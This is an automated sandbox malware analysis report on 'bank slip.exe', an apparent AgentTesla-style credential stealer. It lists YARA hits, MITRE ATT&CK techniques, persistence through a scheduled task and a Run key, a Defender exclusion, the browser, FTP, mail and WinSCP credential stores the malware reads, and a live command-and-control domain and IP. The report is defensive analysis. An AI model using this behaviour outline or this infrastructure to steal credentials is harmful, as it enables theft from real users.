                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR
                        Source: Yara match | File source: 0.2.bank slip.exe.260f66c.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.6750000.10.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.6750000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.33cc7c4.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.298d6c8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.298c6b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.2952c78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.3392d98.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.260f66c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR
                        Source: Yara match | File source: 0.2.bank slip.exe.260f66c.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.6750000.10.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.6750000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.33cc7c4.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.298d6c8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.298c6b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.2952c78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.3392d98.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.bank slip.exe.260f66c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the report's match-count badge for that technique)

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                        Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                        Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                        Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Hidden Files and Directories
                        Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                        Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                        Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                        Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                        Behavior Graph (ID: 1436607, sample: bank slip.exe, start date: 06/05/2024, architecture: WINDOWS, score: 100)

                        Root (node 2): DNS/IP nodes vw-rmplcars.co.in and mail.vw-rmplcars.co.in; signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 14 other signatures. Started: bank slip.exe (node 8), mKSjGvfmIulVB.exe (node 12), GUIVTme.exe (node 14), GUIVTme.exe (node 16).
                        bank slip.exe (node 8): dropped C:\Users\user\AppData\...\mKSjGvfmIulVB.exe (PE32) and C:\Users\user\AppData\Local\...\tmp2859.tmp (XML); signature: Adds a directory exclusion to Windows Defender. Started: RegSvcs.exe (node 18), powershell.exe (node 23), powershell.exe (node 25), schtasks.exe (node 27).
                        mKSjGvfmIulVB.exe (node 12): signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file. Started: RegSvcs.exe (node 29), schtasks.exe (node 31).
                        GUIVTme.exe (node 14): started conhost.exe (node 33).
                        GUIVTme.exe (node 16): started conhost.exe (node 35).
                        RegSvcs.exe (node 18): contacts vw-rmplcars.co.in (111.118.215.27, ports 49710, 49712, 587; PUBLIC-DOMAIN-REGISTRYUS, India); dropped C:\Users\user\AppData\Roaming\...\GUIVTme.exe (PE32); signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Hides that the sample has been downloaded from the Internet (zone.identifier).
                        powershell.exe (node 23): signature: Loading BitLocker PowerShell Module. Started: WmiPrvSE.exe (node 37), conhost.exe (node 39).
                        powershell.exe (node 25): started conhost.exe (node 41).
                        schtasks.exe (node 27): started conhost.exe (node 43).
                        RegSvcs.exe (node 29): signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc).
                        schtasks.exe (node 31): started conhost.exe (node 45).

                        Source | Detection | Scanner | Label
                        bank slip.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                        bank slip.exe | 34% | Virustotal |
                        bank slip.exe | 100% | Joe Sandbox ML |

                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | ReversingLabs |
                        C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | Virustotal |
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                        C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | 38% | Virustotal |

                        No Antivirus matches

                        Source | Detection | Scanner | Label
                        vw-rmplcars.co.in | 11% | Virustotal |
                        mail.vw-rmplcars.co.in | 0% | Virustotal |

                        Source | Detection | Scanner | Label
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
                        http://vw-rmplcars.co.in | 0% | Avira URL Cloud | safe
                        http://mail.vw-rmplcars.co.in | 0% | Avira URL Cloud | safe
                        http://vw-rmplcars.co.in | 11% | Virustotal |
                        http://mail.vw-rmplcars.co.in | 0% | Virustotal |
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        vw-rmplcars.co.in | 111.118.215.27 | true | true | | unknown
                        mail.vw-rmplcars.co.in | unknown | unknown | true | | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://account.dyn.com/ | bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | bank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | bank slip.exe, mKSjGvfmIulVB.exe.0.dr | false | URL Reputation: safe | unknown
                        http://mail.vw-rmplcars.co.in | RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                        http://vw-rmplcars.co.in | RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp | false | 11%, Virustotal; Avira URL Cloud: safe | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        111.118.215.27 | vw-rmplcars.co.in | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1436607
                            Start date and time:2024-05-06 08:12:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 31s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:bank slip.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/19@1/1
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 79
                            • Number of non-executed functions: 8
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target GUIVTme.exe, PID 7860 because it is empty
                            • Execution Graph export aborted for target GUIVTme.exe, PID 8096 because it is empty
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:12:49 | API Interceptor | 2x Sleep call for process: bank slip.exe modified
08:12:53 | API Interceptor | 39x Sleep call for process: powershell.exe modified
08:12:54 | API Interceptor | 53x Sleep call for process: RegSvcs.exe modified
08:12:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
08:12:57 | Task Scheduler | Run new task: mKSjGvfmIulVB path: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
08:12:58 | API Interceptor | 2x Sleep call for process: mKSjGvfmIulVB.exe modified
08:13:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
Match | Associated Sample Name / URL | Detection | Threat Name
111.118.215.27 | SecuriteInfo.com.Win32.CrypterX-gen.8491.21939.exe | malicious | AgentTesla, PureLog Stealer
111.118.215.27 | SecuriteInfo.com.Win32.RATX-gen.18898.23590.exe | malicious | AgentTesla, PureLog Stealer
111.118.215.27 | DELIVERY CERTIFICATE.exe | malicious | AgentTesla, PureLog Stealer
111.118.215.27 | DHL.exe | malicious | AgentTesla
111.118.215.27 | BANK SLIP.exe | malicious | AgentTesla
111.118.215.27 | PO.NO.2203.exe | malicious | AgentTesla
111.118.215.27 | SOA.exe | malicious | AgentTesla
111.118.215.27 | 5TH HIRE BANK SLIP.exe | malicious | AgentTesla
111.118.215.27 | EPDA.exe | malicious | AgentTesla
111.118.215.27 | BANK SLIP.exe | malicious | AgentTesla
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
PUBLIC-DOMAIN-REGISTRY, US | RFQ_MV-33660 TROYER.doc | malicious | AgentTesla | 204.11.59.228
PUBLIC-DOMAIN-REGISTRY, US | PO19176542.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
PUBLIC-DOMAIN-REGISTRY, US | SecuriteInfo.com.Win32.PWSX-gen.23212.6828.exe | malicious | AgentTesla, PureLog Stealer | 207.174.215.249
PUBLIC-DOMAIN-REGISTRY, US | SC-246214.doc | malicious | AgentTesla | 204.11.59.228
PUBLIC-DOMAIN-REGISTRY, US | Order No Q240419617006.exe | malicious | AgentTesla, PureLog Stealer | 207.174.215.249
